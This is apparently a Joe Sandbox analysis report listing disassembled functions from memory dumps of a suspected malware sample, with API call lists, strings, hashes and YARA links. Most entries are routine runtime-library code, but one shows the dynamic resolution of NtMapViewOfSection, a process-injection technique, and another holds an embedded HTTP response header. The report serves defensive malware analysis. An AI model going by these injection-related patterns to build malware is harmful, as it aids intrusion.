Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
Instruction ID: 479c5b84e991bc1a1d2eaf525b1a2ecca84922ba497b39cf2f8c4b5feee52906
Opcode Fuzzy Hash: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
Instruction Fuzzy Hash: 3B018C76B05B9041D604DB12BD8461DB799FB89FE0F55822AEEAD5BBC4CF38C0828740

Uniqueness

Uniqueness Score: -1.00%

Function 036635B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03663604

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

malloc.LIBCMT ref: 0366360F

Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C6A3
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C6A8

free.LIBCMT ref: 036636F6
free.LIBCMT ref: 036636FE
free.LIBCMT ref: 03663706
free.LIBCMT ref: 03663712
free.LIBCMT ref: 0366371F

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction ID: b4d7fcc4974b36fb4a655e97be5fc72516bd8ceaaa0d31909f9b958af6815f79
Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction Fuzzy Hash: B841D538718F4A4FD759EB2CD85557A77D4FB49244754026DD84BC3322EE20E86287C6

Uniqueness

Uniqueness Score: -1.00%

Function 03A64170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A641BD

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

malloc.LIBCMT ref: 03A641C8

Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D25C
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D261

free.LIBCMT ref: 03A642AF
free.LIBCMT ref: 03A642B7
free.LIBCMT ref: 03A642BF
free.LIBCMT ref: 03A642CB
free.LIBCMT ref: 03A642D8

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
Instruction ID: a63e73cba08e58a6fb1301497c495e4ca7fd8cd4003dd7a9ee0983714c05b7d9
Opcode Fuzzy Hash: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
Instruction Fuzzy Hash: 1141D226300B929BDA19DB77A99076E6754FB4EBC0F94452ACF5A4BB04EF34D462C700

Uniqueness

Uniqueness Score: -1.00%

Function 03A6EEAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A6EF25
htonl.WS2_32 ref: 03A6EF2F
malloc.LIBCMT ref: 03A6EF48
free.LIBCMT ref: 03A6EFB5

Strings

zyxwvutsrqponmlk, xrefs: 03A6EF84

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
Instruction ID: 8d868f5b005c0537a40f05a925f2bf2c226a07a54d31aa0817055ad11cbcecd3
Opcode Fuzzy Hash: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
Instruction Fuzzy Hash: 9D21076A30178046DB14EB76AF9472EB7D5AB89BD4F04403A9E598BB69EE3CC4468300

Uniqueness

Uniqueness Score: -1.00%

Function 03A728D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A72913
GetProcAddress.KERNEL32 ref: 03A72923
GetLastError.KERNEL32 ref: 03A729EB

Part of subcall function 03A7ADBC: GetCurrentProcess.KERNEL32 ref: 03A7AE49

Part of subcall function 03A7B220: GetCurrentProcess.KERNEL32 ref: 03A7B24D

Strings

NtMapViewOfSection, xrefs: 03A72919
ntdll.dll, xrefs: 03A72905

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressErrorHandleLastModuleProc
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 1006775078-3170647572
Opcode ID: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
Instruction ID: 59bc046b51c5a9c9ee2f8af6945c2db78cb0fba951f77a999f3489a8d28ba13d
Opcode Fuzzy Hash: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
Instruction Fuzzy Hash: AE31D236711B4486EB20DB62E99876E73A0F788BF4F44432ADEA90BB94DF3CC5458740

Uniqueness

Uniqueness Score: -1.00%

Function 03A712A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A712CA

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

_snprintf.LIBCMT ref: 03A712E9

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

remove.LIBCMT ref: 03A712F5
remove.LIBCMT ref: 03A712FC

Strings

%s\%s, xrefs: 03A712CF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
Instruction ID: 807736e7c33a15f17575eafb7bb8b713c08ff6b31f46ab0949c9fb4d57e18408
Opcode Fuzzy Hash: 116c8ba16e338bd99988bf90a74e2fe71a7e1b136674968703a12a75dd4b6793
Instruction Fuzzy Hash: C4F0543A604B50C6D204DB12BD9026AB364FB85FE0F584537EF891BF15CE38C5518B84

Uniqueness

Uniqueness Score: -1.00%

Function 0366BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03673B83: malloc.LIBCMT ref: 03673B9F

malloc.LIBCMT ref: 0366BF65

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

Part of subcall function 0367BE7F: malloc.LIBCMT ref: 0367BECF

Part of subcall function 0367BE7F: realloc.LIBCMT ref: 0367BEDE

malloc.LIBCMT ref: 0366C057
_snprintf.LIBCMT ref: 0366C0D5
_snprintf.LIBCMT ref: 0366C0FD
_snprintf.LIBCMT ref: 0366C124
free.LIBCMT ref: 0366C292

Part of subcall function 0367875B: malloc.LIBCMT ref: 0367878F
Part of subcall function 0367875B: free.LIBCMT ref: 03678946

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction ID: 4b96bc4739c17a7f62a181bc02c889744f7e39f0e1a18429f5ce7f1cabe6481e
Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction Fuzzy Hash: 77A1B538718B044BDB58FFB4889567E73D6EBD8240F80452D998BCB391EF38D905878A

Uniqueness

Uniqueness Score: -1.00%

Function 0366FDD3 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 03673B83: malloc.LIBCMT ref: 03673B9F

Part of subcall function 0367D9A7: _errno.LIBCMT ref: 0367D8FE
Part of subcall function 0367D9A7: _invalid_parameter_noinfo.LIBCMT ref: 0367D909

fseek.LIBCMT ref: 0366FE6F

Part of subcall function 0367E22B: _errno.LIBCMT ref: 0367E253
Part of subcall function 0367E22B: _invalid_parameter_noinfo.LIBCMT ref: 0367E25E

_ftelli64.LIBCMT ref: 0366FE77

Part of subcall function 0367E29F: _errno.LIBCMT ref: 0367E2BD
Part of subcall function 0367E29F: _invalid_parameter_noinfo.LIBCMT ref: 0367E2C8

fseek.LIBCMT ref: 0366FE87

Part of subcall function 0367E22B: _fseek_nolock.LIBCMT ref: 0367E27C

malloc.LIBCMT ref: 0366FEC7

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

fclose.LIBCMT ref: 0366FF84

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction ID: fb19c3ffd98341a0e5894044f0c9540ae57c54a107bcc17a32215982928b02b8
Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction Fuzzy Hash: 4351F835728B084FC748FB2CE45567A73D5FB89300B50466EE48BC7295EE34AD0287CA

Uniqueness

Uniqueness Score: -1.00%

Function 0368764F Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0368767C

Part of subcall function 03681153: _FF_MSGBANNER.LIBCMT ref: 03681170
Part of subcall function 03681153: _NMSG_WRITE.LIBCMT ref: 0368117A

_lock.LIBCMT ref: 0368768F
_lock.LIBCMT ref: 036876EA
_calloc_crt.LIBCMT ref: 036877A1

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction ID: 9273a340d49f3137d1084254065f43a660fb15c39cb47e397875170980082972
Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction Fuzzy Hash: 7351F671528B488FD718EF28C885266B7D0FB5C310F65479DD88AC7265EB74E842CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 03664937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03664981

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

malloc.LIBCMT ref: 0366498C

Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C6A3
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C6A8

free.LIBCMT ref: 03664A73
free.LIBCMT ref: 03664A7B
free.LIBCMT ref: 03664A87
free.LIBCMT ref: 03664A94

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction ID: d995716acca3455d9a5600c8e87d426f6e5818108677171b6df9a4af67443368
Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction Fuzzy Hash: 2141263521CB0D4FD72AEA2E9C4253A72D9EB96290714423DD487C3316EE61D8078789

Uniqueness

Uniqueness Score: -1.00%

Function 0367DFE4 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0367DEDE
memcpy_s.LIBCMT ref: 0367DFA3
_fileno.LIBCMT ref: 0367E00E

Part of subcall function 03682D5B: _errno.LIBCMT ref: 03682D64
Part of subcall function 03682D5B: _invalid_parameter_noinfo.LIBCMT ref: 03682D6F

Part of subcall function 0368423F: __doserrno.LIBCMT ref: 03684279
Part of subcall function 0368423F: _errno.LIBCMT ref: 03684280

_filbuf.LIBCMT ref: 0367E03C
_errno.LIBCMT ref: 0367E08C

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
String ID:
API String ID: 1812282339-0
Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction ID: 90ce69e283e5984c0461c879b56659154a91a8b52530226d7d77073693c212a8
Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction Fuzzy Hash: 4441163132CF094B972CEA3C5455539B7D2FBE8720BA8076ED49AC3391DE21D86746C6

Uniqueness

Uniqueness Score: -1.00%

Function 0367F697 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 0367F6B4

Part of subcall function 03682D5B: _errno.LIBCMT ref: 03682D64
Part of subcall function 03682D5B: _invalid_parameter_noinfo.LIBCMT ref: 03682D6F

_errno.LIBCMT ref: 0367F6C4

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_errno.LIBCMT ref: 0367F6E0
_isatty.LIBCMT ref: 0367F741
_getbuf.LIBCMT ref: 0367F74D

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction ID: c746a242eb86e8aab5f97d172a2ba10573a4634e83f1bd74affdd42b9754f6cc
Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction Fuzzy Hash: E541C174214B088FCB68EF28C5D5B6677E0FB48310B98069DD85ACF3A6D774D892CB81

Uniqueness

Uniqueness Score: -1.00%

Function 03676C53 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03676C82

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

_snprintf.LIBCMT ref: 03676C9A

Part of subcall function 0367C9C3: _errno.LIBCMT ref: 0367C9FA
Part of subcall function 0367C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0367CA05

free.LIBCMT ref: 03676CB1

Part of subcall function 0367C5CF: _errno.LIBCMT ref: 0367C5EF

malloc.LIBCMT ref: 03676D01
_snprintf.LIBCMT ref: 03676D19
free.LIBCMT ref: 03676D41

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction ID: 218b673e4cd65446d53c056ed60c30430c7d629374f41e9735d97a2c4403f9e5
Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction Fuzzy Hash: BB31A52071CE4C0FD769FB2CA8656B877D2E78D310794829DD48EC3356DE24DC568786

Uniqueness

Uniqueness Score: -1.00%

Function 03A7E56C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A7E5A4

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A7E5AF
_flush.LIBCMT ref: 03A7E661
_fileno.LIBCMT ref: 03A7E682
_flsbuf.LIBCMT ref: 03A7E6C5

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
Instruction ID: d47ea66aeb932802e958d0039e50baa181693e946438773a5416a5bd87fd6999
Opcode Fuzzy Hash: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
Instruction Fuzzy Hash: EE3119353007544ADE38DF675EC4A2AF751B744FE4F1C466A9F6547BD0EA7CC0558200

Uniqueness

Uniqueness Score: -1.00%

Function 03A654F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A6553A

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

malloc.LIBCMT ref: 03A65545

Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D25C
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D261

free.LIBCMT ref: 03A6562C
free.LIBCMT ref: 03A65634
free.LIBCMT ref: 03A65640
free.LIBCMT ref: 03A6564D

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
Instruction ID: ee8ad5280c9105c1f89fc60168ed4a6a7f2bf320b375e7f22f2664bb8c9e5607
Opcode Fuzzy Hash: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
Instruction Fuzzy Hash: FF313736B0478656DB15DB2A685076EBB99FB8ABC8F4D4426CD598BB00EF3CC507C300

Uniqueness

Uniqueness Score: -1.00%

Function 03A88B58 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03A88BBA
_isleadbyte_l.LIBCMT ref: 03A88BEA
MultiByteToWideChar.KERNEL32 ref: 03A88C29
MultiByteToWideChar.KERNEL32 ref: 03A88C77
_errno.LIBCMT ref: 03A88C81

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
Instruction ID: 9b3ae5013786097d93062a3e052864c09cd746eb306f079599d082f7f0477e70
Opcode Fuzzy Hash: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
Instruction Fuzzy Hash: 85319EB221578086DB60EF19E58462DBBA9FB85BC0F58412BEB995BB68DF3CC451C700

Uniqueness

Uniqueness Score: -1.00%

Function 0366ECE3 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0366ED04

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

free.LIBCMT ref: 0366ED3F
fwrite.LIBCMT ref: 0366ED80
fclose.LIBCMT ref: 0366ED88
free.LIBCMT ref: 0366ED95

Part of subcall function 0367C5CF: _errno.LIBCMT ref: 0367C5EF

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction ID: e122d36966854cbf29f1d212698144c11cc4f3962ef62e8823b015e6ebe4d9d4
Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction Fuzzy Hash: 45219029728F094BD794FB2C946476E72E1FBD8250F94062DA44FC7385EE38DD01838A

Uniqueness

Uniqueness Score: -1.00%

Function 00499B00 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00499B19
strlen.MSVCRT ref: 00499B24
memcpy.MSVCRT ref: 00499B41
setlocale.MSVCRT ref: 00499B4F
setlocale.MSVCRT ref: 00499B9C

Memory Dump Source

